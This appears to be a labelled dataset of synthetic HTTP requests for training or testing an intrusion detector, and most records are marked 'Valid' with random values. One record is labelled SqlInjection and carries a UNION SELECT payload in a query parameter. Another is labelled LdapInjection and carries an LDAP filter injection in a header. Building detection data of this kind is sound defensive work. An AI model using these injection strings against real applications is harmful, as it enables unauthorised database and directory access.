Proxy-Authorization: Digest qop=auth-int
Authorization: Digest nonce
Range: 240-
Referer: http://www.Bnso.net/asaI2rs.jpeg
TE: trailers,gzip;q=0.2,trailers
Trailer: If-Match
User-Agent: Mozilla/9.8 (compatible; MSIE 8.9; Open BSD i586; agooile; jetEha)
UA-CPU: PowerPC
UA-Disp: 0717,4017,8
UA-OS: Win9x
UA-Color: color8
UA-Pixels: 948x5637
Via: HTTP/2.0 www.6eaa.jpeg
Transfer-Encoding: gzip
Upgrade: LwEo4c/2.4, leari/4.2, haaiy/0.9
Warning: 798 www.leeOy.tiff "xtasHAn" 
X-Forwarded-For: 199.237.53.206
X-Serial-Number: 881023416032
----: ------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 11077
Start - Id: 21380
class: Valid
GET /fdKuqEO5Cje.ssFVR6nm/nnr/otimi2a/hfjshehoePDfduea/uqe3rT.swf? HTTP/1.1
Host: 58.156.253.184
Connection: close
Accept: application/x-tar;q=0.7
Accept-Charset: hz-gb-2312
Accept-Encoding: 
Accept-Language: *;q=0.5
Cache-Control: no-transform
Client-ip: 17.180.30.16
Cookie: 5Tjmt=109;iL8v1e3=dsu8a
Cookie2: $Version="2"
Date: Thu, 04 Mar 10 23:52:23 GMT
ETag: "NH-4d06ZBYMuVX6"
Expect: faieN
From: 6nzmsEZ@elsd.cz
If-Modified-Since: Wed, 31 Oct 07 13:39:09 UTC
If-Unmodified-Since: Mon, 18 Jan 10 04:59:35 UTC
If-Match: *
If-None-Match: *
If-Range: Thu, 12 Aug 04 10:24:19 GMT
Max-Forwards: 5444
MIME-Version: 7.5
Pragma: usn='sifr'
Proxy-Authorization: Basic d2UxZUU6ZGVzY200d0E=
Authorization: lbqPj 8buhc=p6raoder
Range: -5
Referer: /ivhHCtb.php3
TE: trailers,gzip;q=0.6
Trailer: Max-Forwards
User-Agent: Mozilla/0.2 (Machintosh; U; Mac OS X 6.8; Nt-rh; rv:5.2.4) Gecko/00586408
UA-CPU: x86
UA-Disp: 0248,8478,8
UA-OS: Windows 95
UA-Color: color32
UA-Pixels: 965x768
Via: 1.8 www.dAshaejg.htm:40623
Transfer-Encoding: tsqt; pulr6=rvrotaeC
Upgrade: ehr5t1/8.1, ans/4.0, Pae/6.5
Warning: 104 201.244.255.0 "TtHe7ldEfrh" "Sun, 27 Jan 08 03:21:34 CET"
X-Forwarded-For: 86.182.5.47
X-Serial-Number: 2418413
----: ----------
~~~~~: ~~~~~~~~~~

null

End - Id: 21380
Start - Id: 33072
class: Valid
PUT /mh/nYnXjYGT/fbRrinahniipun/hkxWwYwQ/bixArls3vqHQ.Ggk/9N.TgAUq/i68/_gFEL2aI8GTBet/i3f/.9etcl4Raccept.z/oaO.Lqh4jU/g80.msf? HTTP/1.1
Content-Length: 114
Content-Language: gos,teeta50f,Yf93ioae
Content-Encoding: compress
Content-Location: /henesSr.pdf
Content-MD5: ZU1sZmF0aXNVdGxpYWV0cg==
Content-Type: application/x-www-form-urlencoded
Expires: Thu, 09 Oct 08 24:26:25 UTC
Last-Modified: Sat, 28 Mar 09 22:22:43 UTC
Host: www.aromen7.fr:8
Connection: close
Accept: */*
Accept-Charset: *
Accept-Encoding: 
Accept-Language: *;q=0.9
Cache-Control: no-transform
Client-ip: 198.25.225.124
Cookie: oftanehn=a:aNarN2ag-1@I(eIi;itosexcecl=loi'ir wg;tobefz=e-TG
Cookie2: $Version="0"
Date: Wed, 26 Mar 08 02:33:25 GMT
ETag: W/"gqIWxsvwAx.L8aUb"
Expect: eyIEc
From: sowsRo@erhAjxir.gov
If-Modified-Since: Sun, 24 Oct 04 09:35:59 UTC
If-Unmodified-Since: Mon, 17 Sep 07 01:27:32 GMT
If-Match: "iCuEGYAUH@NTXA0RhfP"
If-None-Match: "4RPWDzJ3F1bmZcdHM23"
If-Range: *
Max-Forwards: 801
MIME-Version: 3.9
Pragma: a=vIn
Proxy-Authorization: Basic b29kczplaG5tY2k=
Authorization: Basic dnRudHRjMXM6NmYwbmVh
Range: -627,-76122
Referer: http://www.ESnto.net/b4laitc.php
TE: gzip,gzip
Trailer: If-Match
User-Agent: nfa3ne (nO0jn@8; eQ01w.Y1)
UA-CPU: MIPS
UA-Disp: 287,078,16
UA-OS: Win98
UA-Color: color16
UA-Pixels: 3468x969
Via: 9.1 88.201.79.212, HTTP/1.2 www.htesfhlt.png, 9.3 251.143.91.225
Transfer-Encoding: oDuhe
Upgrade: rtm/4.4
Warning: 852 242.201.142.37 "iieeezrhirKiervpnhh" "Sun, 10 Jul 05 07:47:00 GMT"
X-Forwarded-For: 205.136.153.13
X-Serial-Number: 71160
----: --------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

esbSxakasta=36873&eaEst=608&oeyim=dueon&6ddewuiltitto=46999761&tv8fgX=eonoes&iTcrbxj=o wp-&IiknsUHs5ny=oyDHJDaUcmW

End - Id: 33072
Start - Id: 19244
class: Valid
GET /mx.Un1/geotandcesB9/ws@z@aWFwlikew_.Q/nWyNe0I5T/nicf3yfnoHeilsc/iSdLUozquFV8UP/GY5Vy7Kgroup byBNgidv/eeooEhjqb/5hr/ob.bin?7sp=saur9lsgjplnlg&mn=7&ea3dU=02091801&ztcnarxeemjmse0=1atia&o6tdhtAtad0ext=djd&fshsthGiudVe=iln3vKiahiohlefnzN&teleiSHin=57990&skotltucsl56asz=rov&rDqetqint=eAx3oo-K&Ajommgsffr=eCyz-D&Lbit133r=0&lrdrcme=r%40a&eiIjRp=1732 HTTP/1.1
Host: www.hupbausa.org:80
Connection: close
Accept: */*;q=0.9
Accept-Charset: *;q=0.1
Accept-Encoding: identity;q=0.2, deflate;q=0.4
Accept-Language: *;q=0.6
Cache-Control: no-transform
Client-ip: 127.195.164.61
Cookie: 3scriptuMsZform9Xw=6scripttdn;aegeiejrfgt=tipsdEjt5Ela;swmfEvtto=1324854352;syenlhosnh=s5noisehdO;or0tresm=eliOl:nnhrdrselect\err&c;0zoe7lvtliet=r7LwtNoFD
Cookie2: $Version="4"
Date: Tue, 30 Oct 07 23:37:30 CET
ETag: "0H_tjOJTlNAP@etWtr"
Expect: lohTAtHi=dfono5
From: hyoesw@4oneiessit.it
If-Modified-Since: Tue, 02 Feb 10 20:52:50 CET
If-Unmodified-Since: Sun, 06 Nov 05 02:00:03 CET
If-Match: *
If-None-Match: "g.Nx7vUVaymBdxaRM"
If-Range: "JZ4bg_c85dlV0F26cfG"
Max-Forwards: 35
MIME-Version: 3.3
Pragma: no-cache
Proxy-Authorization: Basic cG5ucnlsOmV3ZXNlY2Fp
Authorization: NTLM MXFhZXNlYWllclBnYlNyMW90Qmg2ZWVib2p0MHVPcm5odw==
Range: 775-30401,2-
Referer: /eoenx4.cfm
TE: chunked,gzip;q=0.7,gzip
Trailer: Proxy-Authorization
User-Agent: Mozilla/8.9 (X11; U; Linux i386 9.2; od-tl; rv:8.2.3) Gecko/66414060
UA-CPU: x86
UA-Disp: 273,4092,8
UA-OS: Solaris
UA-Color: color16
UA-Pixels: 7913x3682
Via: HTTP/8.2 136.90.37.149, FTP/3.3 204.156.205.133
Transfer-Encoding: compress
Upgrade: 9anlRu/7.8
Warning: 452 1.21.106.241 "sPoaeAFa" "Mon, 19 Jan 09 14:54:25 GMT"
X-Forwarded-For: 144.205.1.122
X-Serial-Number: 344513341459815545
----: ------------------
~~~~~: ~~~~~~~~~~~~~

null

End - Id: 19244
Start - Id: 26982
class: Valid
GET /jrhtsetz/pna3ti0antje/hCo/7yeucrao/rmlVi/vwgataqtatk3OstmAHnf/lWcuNDeyW/mGu5e_V2Z2QQVhMNj/ln9tnea/wezik.cfm?vmuttefdkr=r&I_EPY5_@QTf=3749&Etntiftetkcuawa=tsnk%5CpE&Z02Oreplace0j=+uVgime&yOemLee21m=xfvx&idn=8563&ibgjGGinput8FNuy=3&hn39huNeEEsrvp=sn%2Bo&aeoe9cnbaeaeZd=GMtc&yebFBsabaisw=WE97wDt&vr0C=sat&SzA4AcDp=tSh&Htroi5sserd=uqclwstd6rnteNe HTTP/1.1
Host: www.zetr.net:80
Connection: close
Accept: audio/basic, application/*;q=0.8, audio/*
Accept-Charset: iso-2022-kr;q=0.4, iso-8859-15;q=0.6, x-mac-hebrew;q=0.9, cp-932, iso-8859-8;q=0.9
Accept-Encoding: gzip, identity;q=0.2, identity
Accept-Language: *;q=0.2
Cache-Control: only-if-cached
Client-ip: 128.148.23.146
Cookie: eos=Aystdini;dOe5w5gaao=96
Cookie2: $Version="48"
Date: Sun, 12 Aug 07 04:47:26 GMT
ETag: W/"ZRNduEirGmna_BUVr"
Expect: sh6l=tpbiednd
From: eanp0se@1atltaa.biz
If-Modified-Since: Wed, 03 Mar 04 17:27:02 UTC
If-Unmodified-Since: Fri, 11 Aug 06 04:34:41 CET
If-Match: "M0QsBbLnB6zW2p1@Y"
If-None-Match: *
If-Range: Thu, 23 Apr 09 21:25:11 CET
Max-Forwards: 4
MIME-Version: 5.9
Pragma: no-cache
Proxy-Authorization: Digest uri=/biqENYth/edeooS/chbcKuvl/4rinantn.jsp
Authorization: rfhn sOrrlnn=naksC
Range: -522653
Referer: http://nssae.biz/ehuetlsi/ktoB7/urzt.txt
TE: trailers,deflate;q=0.0,trailers
Trailer: Accept-Charset
User-Agent: Mozilla/8.5 (Machintosh; U; Mac OS X 3.9; fY-ib; rv:1.8.4) Gecko/66305519
UA-CPU: Sparc
UA-Disp: 181,245,8
UA-OS: Linux
UA-Color: color16
UA-Pixels: 6860x985
Via: 5.5 58.242.170.132, HTTP/3.6 www.emEeoaNy.gif
Transfer-Encoding: 7tne6z
Upgrade: n2et/1.1
Warning: 634 119.210.230.98 "Etrefi" "Thu, 26 Oct 06 17:47:14 CET"
X-Forwarded-For: 126.84.101.124
X-Serial-Number: 781010344531
----: -----------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 26982
Start - Id: 31198
class: Valid
GET /PdlAK.5VQlt.e-/etMwlelt6ikn/iPv/t570kAn-emE/otZ4T/2-62SI/kJ5B/gsngmv1o4/Aieboot.inih/hYPnYiycGgrb4zR2.php4?mhu4xsie0Ohrzi=eYM0&.oFWMjJj=g9N%24oiza&osrDaqevoeaytWn=oasmochaotetcl%26xi&yt0tsneNeserct0=g&Noigafet=1450&maiEhspasaekujr=d%24aahavingeti5ua HTTP/1.1
Host: www.0iyeqmap.cz
Connection: 7tso
Accept: image/gif, video/mpeg
Accept-Charset: iso-10646-ucs-2;q=0.8, isiri-3342;q=0.9, iso-8859-3, x-mac-chinesesimp
Accept-Encoding: identity;q=0.4
Accept-Language: *;q=0.4
Cache-Control: only-if-cached
Client-ip: 203.218.237.207
Cookie: ttaeSon8s=o7ssiaPkoypnpd;ii6oznsneQtt5ea=0;ZLyEM8d=6;C66yNZ=415265967
Cookie2: $Version="19"
Date: Tue, 02 Jun 09 21:32:04 UTC
ETag: "FF2Tro_rtx4@In80J"
Expect: 100-continue
From: htelogv@hahUen.st
If-Modified-Since: Mon, 07 Jun 04 05:29:47 GMT
If-Unmodified-Since: Sat, 01 May 04 14:39:48 GMT
If-Match: "4@07881kfZbFRFoDuL8"
If-None-Match: "Ee9BY8Rrd52Kwm4pd8"
If-Range: *
Max-Forwards: 552
MIME-Version: 5.4
Pragma: JidenT='qhp630n'
Proxy-Authorization: t31q4h eigtbotb=ilotn
Authorization: effnne atuae=iae4lcq
Range: 487-253698,1-,198-1
Referer: http://www.cnres8ly.st/RneeLe/oyeni32e.mpeg
TE: gzip,deflate;q=0.8,chunked;q=0.7
Trailer: Expect
User-Agent: h2Osrotiectogfsxhe
UA-CPU: x86
UA-Disp: 974,643,16
UA-OS: Windows 98
UA-Color: color16
UA-Pixels: 3376x378
Via: FTP/7.4 238.179.238.28:013, FTP/8.2 www.VixO.shtml
Transfer-Encoding: gzip
Upgrade: h3ih9e/0.0, 7mwpye/2.3, Es0/2.7, atargv/1.8
Warning: 967 9.3.197.185 "stmf" 
X-Forwarded-For: 169.197.9.202
X-Serial-Number: 06672933371501212247
----: -----------------
~~~~~: ~~~~~~~~~~~~~~~~~~~

null

End - Id: 31198
Start - Id: 29908
class: Valid
GET /ycmdxp_u@aNobjectLiNj5_/iaso4e3e/8rEaRnjTe/auW_zFxK5/5uQnyh4u/eeziyYmoF17iewl/rtn.js? HTTP/1.1
Host: www.epcyin.fr
Connection: ranTy
Accept: */*;q=0.2
Accept-Charset: windows-1258;q=0.9, iso-2022-kr;q=0.3, shift_jis;q=0.5, koi8, iso-8859-15
Accept-Encoding: *;q=0.2
Accept-Language: *;q=0.3
Cache-Control: no-cache
Client-ip: 62.30.118.125
Cookie: GLsscriptK=4239153
Cookie2: $Version="15"
Date: Thu, 17 Sep 09 18:57:52 CET
ETag: W/"7MRCAMCo4sZHzVITp"
Expect: 100-continue
From: mnafich@nsbersImyu.fr
If-Modified-Since: Wed, 19 Sep 07 12:42:57 UTC
If-Unmodified-Since: Sun, 23 Jan 05 24:48:57 CET
If-Match: *
If-None-Match: *
If-Range: Sun, 22 Nov 09 08:47:37 GMT
Max-Forwards: 291
MIME-Version: 0.6
Pragma: no-cache
Proxy-Authorization: meaud m7h0u=nztdpF
Authorization: Basic YWs4ZTpuYWtt
Range: 73-062771
Referer: /srsnn.pdf
TE: deflate,deflate;q=0.8
Trailer: If-Match
User-Agent: Mozilla/1.0 (Windows; U; Win 9x 8.9; te-6w; rv:3.7.5) Gecko/33894070
UA-CPU: 68000
UA-Disp: 5197,782,16
UA-OS: Win98
UA-Color: color8
UA-Pixels: 3101x221
Via: 4.7 5.239.91.78, 1.4 www.onbMfq.htm, FTP/5.0 15.46.138.36
Transfer-Encoding: gzip
Upgrade: spt/3.7, rs8xQ/8.1, ovEla/6.7, hsp/5.3, ecaol/5.8
Warning: 601 103.90.185.56:00009 "bInvy9od2reoewohbO" "Thu, 26 Mar 09 12:32:40 UTC"
X-Forwarded-For: 221.63.83.226
X-Serial-Number: 615013754882533
----: -------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~

null

End - Id: 29908
Start - Id: 41876
class: SqlInjection
GET /gtzbePlDesyf9s/jPf2QWTGlq/KXFmUaTucc/pv./nIxuYXkEqw/thn0m/wiwdEUirrpa2oa/x3/admindropXJBusr1jofBtb/FiOv/n6.css?sas4no7nE=%27++++%29+++UNION+ALL+SELECT+++2+++FROM++tcivurb+++WHERE+++%28++++%27%27+%3D+%27&io5goOo4rRsn=%3A1binsertteta+htaccesYso&WAxtermvar=rSw%40H3RK6P&2whxmlA=o%3Clocation&mg=ntke9 HTTP/1.0
Host: 37.105.242.215
Connection: keep-alive
Accept: */*;q=0.2
Accept-Charset: *;q=0.0
Accept-Encoding: *;q=0.9
Accept-Language: enr-nvo5sAo, aavh-oejg;q=0.9, u-9;q=0.3, hu8nl9on-ou7;q=0.0
Cache-Control: min-fresh=856
Client-ip: 151.178.225.162
Cookie: rsyoasinsmnaa4=b
Cookie2: $Version="01"
Date: Tue, 19 Sep 06 23:49:18 GMT
ETag: W/"X9gKQ67xN.@_uj8"
Expect: estmtade=iia9d
From: uims2c@rtXh1sbi2a.cz
If-Modified-Since: Mon, 05 May 08 21:01:52 CET
If-Unmodified-Since: Fri, 23 Sep 05 05:05:41 UTC
If-Match: "U1A5DuR7To-WV15tON"
If-None-Match: *
If-Range: Mon, 01 Nov 04 08:58:29 CET
Max-Forwards: 385
MIME-Version: 0.4
Pragma: no-cache
Proxy-Authorization: hruhs OR2omeK=eaefp
Authorization: Basic b2VlZ3c6bmFuSGF6
Range: 2764-93323,17883-91
Referer: http://oasamh.org/b2eaee/Ghit/Ccnmnhs.asp
TE: trailers,deflate;q=0.3,trailers
Trailer: Date
User-Agent: Mozilla/8.7 (compatible; aadvh2un; Win 9x; ne8tnny; 71ttaeRvt)
UA-CPU: PowerPC
UA-Disp: 9347,2639,16
UA-OS: Windows 95
UA-Color: color16
UA-Pixels: 044x365
Via: 2.0 63.242.122.3, FTP/9.8 www.nlhd.jpg
Transfer-Encoding: deflate
Upgrade: 4sh/4.2, Rdhtih/8.1
Warning: 392 113.130.15.37 "8vRtmnhtkaGbbhnilg" 
X-Forwarded-For: 123.208.82.116
X-Serial-Number: 3139045
----: --------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 41876
Start - Id: 37376
class: LdapInjection
GET /mDmN4U/1elsdXdsattcdmreApr/Esidu/lk_CnIK6_F6rA9/mail15bo1.nsf? HTTP/1.0
Host: www.Eneh1wuweh.com
Connection: goro
Accept: */*
Accept-Charset: *;q=0.7
Accept-Encoding: ")(targetfilter=(o=NetscapeRoot))
Accept-Language: ht-wlsiT
Cache-Control: min-fresh=7
Date: Sun, 06 Jul 08 19:24:09 UTC
If-Modified-Since: Mon, 06 Jul 09 22:35:48 UTC
If-Unmodified-Since: Sat, 12 May 07 20:29:55 GMT
If-Match: *
If-None-Match: *
If-Range: *
Max-Forwards: 608
MIME-Version: 0.7
Pragma: hIo='grse'
Proxy-Authorization: NTLM cE1xbFZzSXJnb2V2N2FlYWVvb2FydG9qMjJMZDVnbjFxcg==
Authorization: mm9c rCr23El=5vTrri
Range: 059445-,841-
Referer: http://www.teeohyxd.ch/t77sdCh/5ahsk/w7agr6/futa26/sncs.mp3
TE: trailers
User-Agent: Mozilla/2.1 (compatible; Konqueror/9.3; Win 9x; Nwe3omhrar; 3tlseh; 5hft)
UA-OS: Windows 95
Transfer-Encoding: gzip

null

End - Id: 37376
Start - Id: 27564
class: Valid
GET /u2zk-Rz1FHmH/Sq1Y/lWhC7U16197_.msf? HTTP/1.0
Host: 109.184.14.40
Connection: close
Accept: */*;q=0.2
Accept-Charset: iso-8859-7, gb2312, macintosh;q=0.8, iso-8859-15, utf-8
Accept-Encoding: compress;q=0.4
Accept-Language: *;q=0.8
Cache-Control: only-if-cached
Client-ip: 87.97.166.93
Cookie: mTsorrd5s=arfsdke
Cookie2: $Version="6"
Date: Fri, 18 Mar 05 01:55:08 GMT
ETag: "mba2Z2G5bX_IQJM@p"
Expect: shete=A2xRIa9
From: rn1otcn@tde51wqd.st
If-Modified-Since: Mon, 04 Jul 05 07:08:11 CET
If-Unmodified-Since: Mon, 05 Nov 07 05:49:34 CET
If-Match: *
If-None-Match: ".dhagL1w-c8FSUYV"
If-Range: "dcwF364jqM5QStER-G"
Max-Forwards: 6
MIME-Version: 6.0
Pragma: dse5atet=shohrt
Proxy-Authorization: Basic bWF0dGE6b2VzdA==
Authorization: Digest username="nilda3o"
Range: 0-33,159-222311,3856-
Referer: http://neHeoLxd.it/brmrhcje.php3
TE: trailers,trailers
Trailer: If-None-Match
User-Agent: omseodasl/4.3.1
UA-CPU: 68000
UA-Disp: 883,733,32
UA-OS: Linux
UA-Color: color8
UA-Pixels: 4534x344
Via: HTTP/7.6 241.129.162.21
Transfer-Encoding: compress
Upgrade: tqtyi/0.3, 5aftHf/0.4, ifhtn/3.3, ntdsF/5.0
Warning: 197 179.125.106.204:45943 "tentotelsaAsctyrRtpu" 
X-Forwarded-For: 49.154.202.141
X-Serial-Number: 76901665181608584434
----: ------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 27564
Start - Id: 12334
class: Valid
GET /naedtjvfhoayadfhil/telnetGcYb.8ZDv3Vy/Ca/hewmhpveieeTdu2/ah2/36YL7IsdcA2/E824/i-8IM2Yz/aVEC1V_2gci58wNJF/ieugRhfnylla5isu.jsp?mfXsBsSahnhi=1&hpgm=s5WuD HTTP/1.0
Host: 4.176.165.114
Connection: close
Accept: */*;q=0.6
Accept-Charset: big5, x-mac-ce, cp-932;q=0.6
Accept-Encoding: deflate;q=0.4, gzip, compress
Accept-Language: *;q=0.5
Cache-Control: lnbye='0ne'
Client-ip: 120.80.21.176
Cookie: mlLlhXriWauarne=leCw3
Cookie2: $Version="899"
Date: Wed, 28 Apr 04 17:18:00 GMT
ETag: W/"HRo_O6CCOGzRZ7ilvJ6"
Expect: t9oi8f2=dctdtist
From: atRwrmd@teke.it
If-Modified-Since: Sun, 14 May 06 12:07:48 UTC
If-Unmodified-Since: Sun, 26 Jul 09 08:28:09 CET
If-Match: "vkeY@Jt8R_iPJOv"
If-None-Match: *
If-Range: "niYQB-b_UgIUOb4ne2z5"
Max-Forwards: 1262
MIME-Version: 2.7
Pragma: asm='3p6a'
Proxy-Authorization: eitfn ddWoshr1=obTeG
Authorization: 8esr oanesgt=ewduef
Range: 662-4,8147-,483669-546
Referer: http://heSD.com/14iav/5tpgali/7xem/iiuTrji/2ee3Es.swf
TE: gzip,trailers
Trailer: Proxy-Authorization
User-Agent: Mozilla/6.2 (compatible; Konqueror/8.7; Open BSD i386; yahlle; cvpA6pv; ors9rr1elo)
UA-CPU: Sparc
UA-Disp: 5821,502,32
UA-OS: FreeBSD
UA-Color: color32
UA-Pixels: 9575x9608
Via: FTP/8.9 www.p5eSet.png, 2.8 www.iheere.jpeg:1516
Transfer-Encoding: compress
Upgrade: got9/5.0
Warning: 258 141.130.237.37 "ioreaseroE" "Tue, 27 Sep 05 18:21:28 UTC"
X-Forwarded-For: 111.220.164.212
X-Serial-Number: 7559329085977019735
----: ------------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~

null

End - Id: 12334
Start - Id: 13937
class: Valid
GET /eLpur1ehlrgjtteure2/t.40iNPsYxo3bDOG/Epuf/anSs/ahoct/naEesipee6Nsvlosyi/hGt4..htm?8EosW=xi1z1r&nointnitdbgt8a=10&lcloIznase=08370&eiddld=n3h5tene&eq2ee4tnhymi=05608826&@91@fi=+3vob5n%5B&gtue4=72734884 HTTP/1.1
Host: 61.217.14.206
Connection: keep-alive
Accept: text/xml;q=0.4
Accept-Charset: *
Accept-Encoding: 
Accept-Language: vnmsog-Mm8Ln, loume-eynintyl;q=0.5, sr4epAba-eC1oAc;q=0.3, 0hbrnm6-Hnbi;q=0.3, vewdon-g1
Cache-Control: emdds=tsear
Client-ip: 107.19.75.92
Cookie: 9fas=9oiA;ohemerjntsc=6tg1rltn9ec2nei;h6ipeq=660671;7mhieIhpxgoitir=execynzerene;gqoto=91775;siar=oeereEsudehkived
Cookie2: $Version="3"
Date: Tue, 16 Sep 08 07:22:55 GMT
ETag: W/"uc3AZU3AIgMsfoMc"
Expect: 100-continue
From: fotas@seuiv.net
If-Modified-Since: Sat, 01 Jul 06 17:14:27 CET
If-Unmodified-Since: Sat, 06 Nov 04 02:05:05 GMT
If-Match: "utOP@QIOJSm5kbsNr"
If-None-Match: *
If-Range: Sun, 15 Jun 08 12:54:17 GMT
Max-Forwards: 6780
MIME-Version: 0.9
Pragma: no-cache
Proxy-Authorization: Basic ZTZzcmVzUm86aGFld2VJbWw=
Authorization: Digest algorithm=MD5-sess
Range: 16718-,971215-
Referer: /bnmhzh5/ebeoj2i.msf
TE: gzip,trailers
Trailer: User-Agent
User-Agent: Mozilla/4.8 (Windows; U; Win98 2.5; sn-co; rv:1.0.9) Gecko/39035823
UA-CPU: PowerPC
UA-Disp: 2622,860,16
UA-OS: Linux
UA-Color: color8
UA-Pixels: 5851x4169
Via: 0.1 www.doeriw.jpg
Transfer-Encoding: compress
Upgrade: lpeSTs/3.3, o5tAe/3.7
Warning: 669 www.eavortz.js "DSa8rfspiemkwse7" "Sun, 22 Feb 09 17:32:26 UTC"
X-Forwarded-For: 144.135.40.157
X-Serial-Number: 80655
----: --------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 13937
Start - Id: 21131
class: Valid
GET /rXsDr.k0Qp-ul-fsfxZy/23KOwl.d/aiepu7eooiewKanoe6a/tbFrqd/wonOe/nrhSnsi/yuitErt8ptisea3nevnd.swf?n4xunitgatodsde=72110812&elsa4pobtdewtzh=by9uesusqt&as=hU9_Q&2qai=77&5rnaWhlr=nsseebjeme&t8ewntb2Gsoq=odw&8Stvoeo8tTlibs=rye%24wbhutruservices HTTP/1.1
Host: www.uoOia0.be
Connection: dtatsfnw
Accept: audio/basic, video/*, application/*
Accept-Charset: *;q=0.3
Accept-Encoding: *
Accept-Language: Eeshyl-UrsF;q=0.7, Lfn-l
Cache-Control: no-transform
Client-ip: 139.120.122.69
Cookie: ml94p=uasoiaonLda1azhil0;TanhiejuRnse0n=Eukhsjaw3
Cookie2: $Version="54"
Date: Wed, 19 Aug 09 19:54:58 UTC
ETag: "VR5Hc8RtYKkR9cBH"
Expect: tetnMsTh
From: idssoghm@tIhNr.de
If-Modified-Since: Tue, 12 Sep 06 08:43:49 GMT
If-Unmodified-Since: Mon, 19 Jan 04 09:25:40 CET
If-Match: "t-1.r5CkrPNr-_PKKEc"
If-None-Match: "oxztxuJ7vS8rg@S@P"
If-Range: Sat, 28 May 05 12:53:50 GMT
Max-Forwards: 9
MIME-Version: 1.0
Pragma: no-cache
Proxy-Authorization: NTLM OHV1MmUycm1ucHU1OGVvbjdhclIyb3RpZTJsYWVvYnI=
Authorization: Digest opaque="nretnehs"
Range: 08246-7
Referer: /9xo2tp.php4
TE: trailers,trailers
Trailer: Connection
User-Agent: Mozilla/0.1 (compatible; MSIE 1.7; Windows NT; tnd2da; a9ufdie; OlgI)
UA-CPU: PowerPC
UA-Disp: 595,813,32
UA-OS: Windows 95
UA-Color: color8
UA-Pixels: 739x758
Via: ootei/6.5 www.cxutAa59.css, efDZ/2.3 www.0i47.jpg
Transfer-Encoding: deflate
Upgrade: euef/5.6, Nsa8t/7.8, upugmw/9.2, hans/3.6
Warning: 738 www.hBzo7et.htm "seMl" 
X-Forwarded-For: 3.73.105.34
X-Serial-Number: 0274722
----: -----------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 21131
Start - Id: 23716
class: Valid
GET /eetesd9/CNTh2lfhavingS/Dg44rratni/1h/ITkcbZreplacepvbscriptH/rhsiUarsUlo/fdunitg/a8v/iSU/rzoCS0IeKMuqPC_K..swf?cmdHsP9asJdiv_=e.CxJ HTTP/1.1
Host: 31.187.109.142:80
Connection: close
Accept: */*
Accept-Charset: *
Accept-Encoding: 
Accept-Language: ru-raeeRrUh, ire-w;q=0.0, 5b9obp-Hnhs;q=0.0
Cache-Control: no-cache
Client-ip: 26.208.93.197
Cookie: oOphiizl=097
Cookie2: $Version="51"
Date: Thu, 17 Jan 08 08:18:53 UTC
ETag: W/"kb6e.IR6Q_h9Bn7yJ2"
Expect: jl0ss=mdssnhte
From: rteef@dehrxns.com
If-Modified-Since: Sat, 14 Jul 07 05:21:12 CET
If-Unmodified-Since: Sat, 24 Apr 10 01:10:21 UTC
If-Match: "MPHlK5@rDQVYawK_"
If-None-Match: *
If-Range: "COPez5GU_9CFwxyh-"
Max-Forwards: 310
MIME-Version: 3.3
Pragma: no-cache
Proxy-Authorization: NTLM YTJ2Y2Vtc29wdGF1bWZlaWRtaGUxZmVvc2RvdHdnYUFpcg==
Authorization: uoRalt nerE=Ogjm
Range: -5
Referer: /o1e8us/qeann.swf
TE: deflate;q=0.3,chunked
Trailer: If-None-Match
User-Agent: dlusasb (nS4hZ4E3D)
UA-CPU: PowerPC
UA-Disp: 807,314,32
UA-OS: Solaris
UA-Color: color8
UA-Pixels: 431x276
Via: HTTP/1.0 www.uilanhkl.jpg, FTP/5.9 www.oahonis.jpeg, FTP/9.4 www.o1oi2tel.gif
Transfer-Encoding: eirhc
Upgrade: Oias/7.2, yee/0.3
Warning: 169 20.110.71.138:174 "Xuulgeai2thhnsm" "Tue, 19 May 09 22:55:23 CET"
X-Forwarded-For: 20.78.164.130
X-Serial-Number: 13224
----: -------------
~~~~~: ~~~~~~~~~~~~~~~~~~

null

End - Id: 23716
Start - Id: 19470
class: Valid
GET /yOzr/bO.ZSuz/ch6ta6nntem/stmtEs/hdbprets3/eDQK/lnullFtaCwZ/riEean/O37tserowutewa.nsf?vw=delete%40be HTTP/1.1
Host: www.aelu2z.biz:55
Connection: r2tEaiE
Accept: */*
Accept-Charset: *;q=0.2
Accept-Encoding: *;q=0.7
Accept-Language: oi6soe-o7u;q=0.0
Cache-Control: only-if-cached
Client-ip: 12.141.71.16
Cookie: tn6e=qoeev9anler2
Cookie2: $Version="084"
Date: Sat, 03 Jun 06 20:07:28 GMT
ETag: W/"cIg3rcFCeaB2JiYf"
Expect: leieeu
From: onnnAm1I@spE2Fe0rns.com
If-Modified-Since: Fri, 02 Dec 05 04:23:12 CET
If-Unmodified-Since: Sat, 30 Jun 07 11:34:27 GMT
If-Match: *
If-None-Match: "nxRy9yxrfoXC5u.QwDz"
If-Range: Sun, 24 Feb 08 16:52:09 GMT
Max-Forwards: 4345
MIME-Version: 1.9
Pragma: no-cache
Proxy-Authorization: NTLM YXV0ZW9xZXN5bjNuZXpvaWJJaGh4aWN1ZUUwZkVlS3JoZWloZVVkZWVBZQ==
Authorization: Basic bnNnZGhubmI6c2Vhcg==
Range: -40334,71196-
Referer: /ztyh3nj0/yQFei.msf
TE: gzip;q=0.7
Trailer: Max-Forwards
User-Agent: tss9tbRha9u
UA-CPU: PowerPC
UA-Disp: 201,6809,8
UA-OS: Linux
UA-Color: color8
UA-Pixels: 6480x436
Via: 3.2 225.158.217.141, 4.9 198.134.70.161:1, s1l5N/7.4 www.Higa.shtml:95
Transfer-Encoding: identity
Upgrade: Ace/7.8, srte/5.7
Warning: 023 www.yttU5rcS.png "umpoHgenaihro" "Mon, 28 Mar 05 07:12:11 UTC"
X-Forwarded-For: 229.29.101.243
X-Serial-Number: 219251362727568
----: --------------
~~~~~: ~~~~~~~~~~~~~~~~

null

End - Id: 19470
